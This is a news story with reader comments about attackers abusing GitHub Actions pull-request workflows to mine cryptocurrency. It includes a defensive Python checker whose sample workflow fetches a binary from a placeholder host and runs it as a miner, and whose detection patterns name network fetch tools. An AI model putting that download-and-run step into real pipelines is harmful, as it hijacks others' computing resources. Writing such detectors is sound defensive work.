
posted by martyb on Monday April 05 2021, @07:27PM
from the abusing-GitHub-for-fun-and-profit dept.

GitHub Actions being actively abused to mine cryptocurrency on GitHub servers

GitHub Actions is currently being abused by attackers to mine cryptocurrency using GitHub's servers in an automated attack.

GitHub Actions is a CI/CD solution that makes it easy to automate all your software workflows and set up periodic tasks.

The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, then opens a Pull Request asking the original repository maintainers to merge the code back and so alter the original code. However, no action by the maintainer of the legitimate project is required for the attack to succeed.

BleepingComputer also observed that the malicious code loads a misnamed crypto miner, npm.exe, from GitLab and runs it with the attacker's wallet address. Additionally, after initially reporting on this incident, BleepingComputer has come across copycat attacks targeting more GitHub projects in this manner.

Here is how it works:

The attack involves first forking a legitimate repository that has GitHub Actions enabled. It then injects malicious code into the forked version and files a Pull Request for the original repository maintainers to merge the code back. But, in an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request.

Perdok says that merely filing the Pull Request is enough for the attacker to trigger the attack. This is especially true for GitHub projects that have automated workflows set up to validate incoming Pull Requests via Actions. As soon as a Pull Request is created for the original project, GitHub's systems execute the attacker's code, which instructs GitHub servers to retrieve and run a crypto miner.

It looks like the validation of the Pull Request is what triggers execution of the cryptominer. I wonder how long GitHub Actions will run a task before killing it?
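As an added illustration (not code from the story or from BleepingComputer's write-up), here is a small Python check a maintainer could run over the workflow files a pull request touches. It flags `run:` steps that fetch from a URL and then execute something, which is the shape of the abuse described above (a misnamed binary is downloaded and run). The sample workflow, host name and wallet string are constructed placeholders.

```python
import re

# Constructed sample, modelled on the story: a fork's workflow is rewritten so that the
# pull_request-triggered job fetches a binary from an external host and runs it.
# The host, path and wallet value are placeholders, not indicators from the article.
SAMPLE_WORKFLOW = """\
name: CI
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: npm ci
      - run: |
          curl -sL https://gitlab.example/placeholder/npm.exe -o npm.exe
          chmod +x npm.exe
          ./npm.exe --wallet PLACEHOLDER_WALLET
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b")
# Markers that something local is being made executable or launched.
EXEC_RE = re.compile(r"(^|[\s;&|])(\./\S+|chmod\s+\+x|bash\s+\S+|sh\s+\S+|Start-Process)", re.M)


def extract_run_commands(workflow_text: str) -> list[str]:
    """Collect the shell text of every `run:` step, including `run: |` literal blocks."""
    commands, block, indent = [], None, 0
    for line in workflow_text.splitlines():
        stripped = line.lstrip()
        if block is not None:                      # inside a multi-line run block
            if not stripped:
                continue
            if len(line) - len(stripped) >= indent:
                block.append(stripped)
                continue
            commands.append("\n".join(block))      # block ended: dedent seen
            block = None
        m = re.match(r"-?\s*run:\s*(.*)$", stripped)
        if m:
            body = m.group(1).strip()
            if body in ("|", ">", "|-", ">-"):     # block scalar: lines follow, indented deeper
                block, indent = [], (len(line) - len(stripped)) + 1
            else:
                commands.append(body)
    if block:
        commands.append("\n".join(block))
    return commands


def flag_download_and_execute(workflow_text: str) -> list[dict]:
    """One finding per run step that both fetches from the network and executes something."""
    findings = []
    for cmd in extract_run_commands(workflow_text):
        urls = URL_RE.findall(cmd)
        if (urls or FETCH_RE.search(cmd)) and EXEC_RE.search(cmd):
            findings.append({"command": cmd, "urls": urls})
    return findings
```

The heuristic is deliberately coarse: it is meant to surface a workflow change for human review, not to decide on its own whether a step is malicious.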


  • (Score: 1, Insightful) by Anonymous Coward on Monday April 05 2021, @07:49PM (12 children)

    by Anonymous Coward on Monday April 05 2021, @07:49PM (#1133592)

    Life finds a way, eh?

    • (Score: 3, Touché) by DannyB on Monday April 05 2021, @08:04PM (11 children)

      by DannyB (5839) Subscriber Badge on Monday April 05 2021, @08:04PM (#1133602) Journal

      I wish life could find a way to make cryptocurrency miners die off except on systems where they are welcomed. But maybe that is unwelcoming and politically incorrect.

Miners must have a note from parent / guardian to work in the mines more than 16 hours / day, or on GPUs

      --
      To transfer files: right-click on file, pick Copy. Unplug mouse, plug into other computer. Right-click paste.
      • (Score: 0) by Anonymous Coward on Monday April 05 2021, @08:59PM (4 children)

        by Anonymous Coward on Monday April 05 2021, @08:59PM (#1133621)

        But maybe that is unwelcoming and politically incorrect.

        Only if the cryptominer is black. If they're white, you can be as racist as fuck with the blessings of your democrat overlords.

        • (Score: 0) by Anonymous Coward on Monday April 05 2021, @09:27PM (3 children)

          by Anonymous Coward on Monday April 05 2021, @09:27PM (#1133635)
          lol @ blaming democrats for the actions of your like-minded buddies.
          • (Score: 0) by Anonymous Coward on Monday April 05 2021, @09:35PM (2 children)

            by Anonymous Coward on Monday April 05 2021, @09:35PM (#1133640)

            projection, their favorite sport

            kinda how we're finding out all the pedos are actually republicans and there is never any outrage from conservatives unless a democrat is blamed

            truly they are disturbed people

            • (Score: 0) by Anonymous Coward on Monday April 05 2021, @09:49PM (1 child)

              by Anonymous Coward on Monday April 05 2021, @09:49PM (#1133642)

              No, the Dems just get away with it. Like Hunter and Joe.

              • (Score: 0) by Anonymous Coward on Monday April 05 2021, @11:06PM

                by Anonymous Coward on Monday April 05 2021, @11:06PM (#1133670)
                You lot have spent so much time defending the Trump Administration that you'll latch on to anything. "Dems got away with Hunter's laptop!" "BLM attacked the Capitol!!" "We're not toxic, everybody we need services from hates freedom of speech!"
      • (Score: 4, Insightful) by Thexalon on Monday April 05 2021, @09:24PM (5 children)

        by Thexalon (636) on Monday April 05 2021, @09:24PM (#1133631)

        How to end cryptocurrency mining:
        1. Don't buy cryptocurrency, or mine it yourself.
        2. Don't accept cryptocurrency as payment for your business.
        3. Encourage law enforcement to take advantage of blockchain's recording technology to track down and prosecute illegal uses of cryptocurrency.

        If all 3 of those happen and are widespread enough, cryptocurrency stops being valuable, and thus people will stop spending lots of real money mining it and/or stealing resources to mine it.

        --
        The only thing that stops a bad guy with a compiler is a good guy with a compiler.
        • (Score: -1, Troll) by Anonymous Coward on Monday April 05 2021, @09:37PM (1 child)

          by Anonymous Coward on Monday April 05 2021, @09:37PM (#1133641)

          You Democrats love to control things, don't you?

          • (Score: 3, Touché) by Thexalon on Monday April 05 2021, @10:03PM

            by Thexalon (636) on Monday April 05 2021, @10:03PM (#1133647)

            So let me get this straight: Somebody chooses by their own free will not to accept, purchase, or mine cryptocurrency, and that's me saying that I want to control people?

            --
            The only thing that stops a bad guy with a compiler is a good guy with a compiler.
        • (Score: 2) by inertnet on Monday April 05 2021, @11:14PM (2 children)

          by inertnet (4071) on Monday April 05 2021, @11:14PM (#1133672) Journal

          Why don't you require cryptocurrency miners to do their mining calculations with a pen on paper.

          • (Score: 2) by Thexalon on Tuesday April 06 2021, @02:18AM

            by Thexalon (636) on Tuesday April 06 2021, @02:18AM (#1133729)

            That would be in fact less destructive than many of the methods miners have been using the last few years. Paper is a fairly sustainable product these days.

            --
            The only thing that stops a bad guy with a compiler is a good guy with a compiler.
          • (Score: 0) by Anonymous Coward on Tuesday April 06 2021, @05:47AM

            by Anonymous Coward on Tuesday April 06 2021, @05:47AM (#1133774)

Pen and paper? You are going to kick off the great slide rule arms race by those coin miners. And just you wait until they rediscover Curtas.

  • (Score: 5, Insightful) by crafoo on Monday April 05 2021, @09:02PM (1 child)

    by crafoo (6639) on Monday April 05 2021, @09:02PM (#1133622)

    Ingenious, well executed, exploitation of a system like this is a thing of beauty.

    "As soon as a Pull Request is created for the original project, GitHub's systems would execute the attacker's code which instructs GitHub servers to retrieve and run a crypto miner."

ooops. just running whatever random code someone submits? I wonder if this is the first time it has been exploited, or if this is just the first widespread one to draw notice.

    • (Score: 2) by progo on Tuesday April 06 2021, @12:56AM

      by progo (6356) on Tuesday April 06 2021, @12:56AM (#1133706) Homepage

      It must have happened before, but this time it's about "Bitcoin" and someone outside of GitHub found out.

      Assuming no countermeasures exist at all (probably a bad assumption) the basic idea to get free computing done from their "Actions" process seems obvious.

  • (Score: 2) by legont on Tuesday April 06 2021, @12:29AM (3 children)

    by legont (4179) on Tuesday April 06 2021, @12:29AM (#1133700)

I had a few powerful idle servers at the office so I ran SETI on them 24x7. Nobody ever asked anything. How it differs from crypto mining I still wonder.

    --
    "Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
    • (Score: 0) by Anonymous Coward on Tuesday April 06 2021, @01:37AM

      by Anonymous Coward on Tuesday April 06 2021, @01:37AM (#1133722)

      You aren't appropriating the resources of others for your own pecuniary benefit.

    • (Score: 2) by Unixnut on Tuesday April 06 2021, @08:53AM (1 child)

      by Unixnut (5779) on Tuesday April 06 2021, @08:53AM (#1133797)

      Well, to be fair even nowadays, running SETI (or BOINC) on office servers is considered bad practice, if not cause for disciplinary action.

      The reasons it could have been done "once upon a time" are primarily:

      1. Computers were not as good at power management as they are now. Whether a server was at 100% or mostly idle didn't result in a massive difference in the power bill or cooling costs, so nobody really noticed.
2. There was less general awareness of computer technology/security. Back in the 90's and 00's, the local sysadmin was very much "king of the hill" for the computers and servers, and could run things like SETI without the rest of the office knowing. Especially as it also worked as a screensaver.
      3. Security was not such a big deal. Nowadays, if there is a compromise of the office, the company itself can be liable. They have security departments monitoring for things like bittorrent/crypto-miners/SETI/BOINC etc... and shutting them down. A compromise can be blamed on any one of these third party tools, even if they were not at fault, meaning there is a very high risk vs reward for running them on office machines.

Saying that, SETI/BOINC to my knowledge never had an issue of exploitation, which is impressive, when you consider they work on the pretext of sending binary executables to people's machines in order to do local processing. Sending one compromised binary to thousands of machines at once must have been a juicy target.

      Crypto-mining in that sense is a bit more secure, as you are not constantly pulling executables off the internet as part of the processing, but rather just calculating hashes that are sent to and fro. Still a risk because the crypto-miner itself needs to be downloaded off the internet itself.

      • (Score: 0) by Anonymous Coward on Wednesday April 07 2021, @02:17AM

        by Anonymous Coward on Wednesday April 07 2021, @02:17AM (#1134144)

        SETI and BOINC are both open source. One reason why attacks on their infrastructure were relatively rare is because people compiled their own versions to squeeze out that little edge. They also routinely compared the result with the distributed version. In addition, most BOINC projects don't actually send the executable along for the ride in work units. "Applications" have their own secondary distribution system that is much more tightly controlled and there is "anonymous platform" support if you don't want to download executables at all.
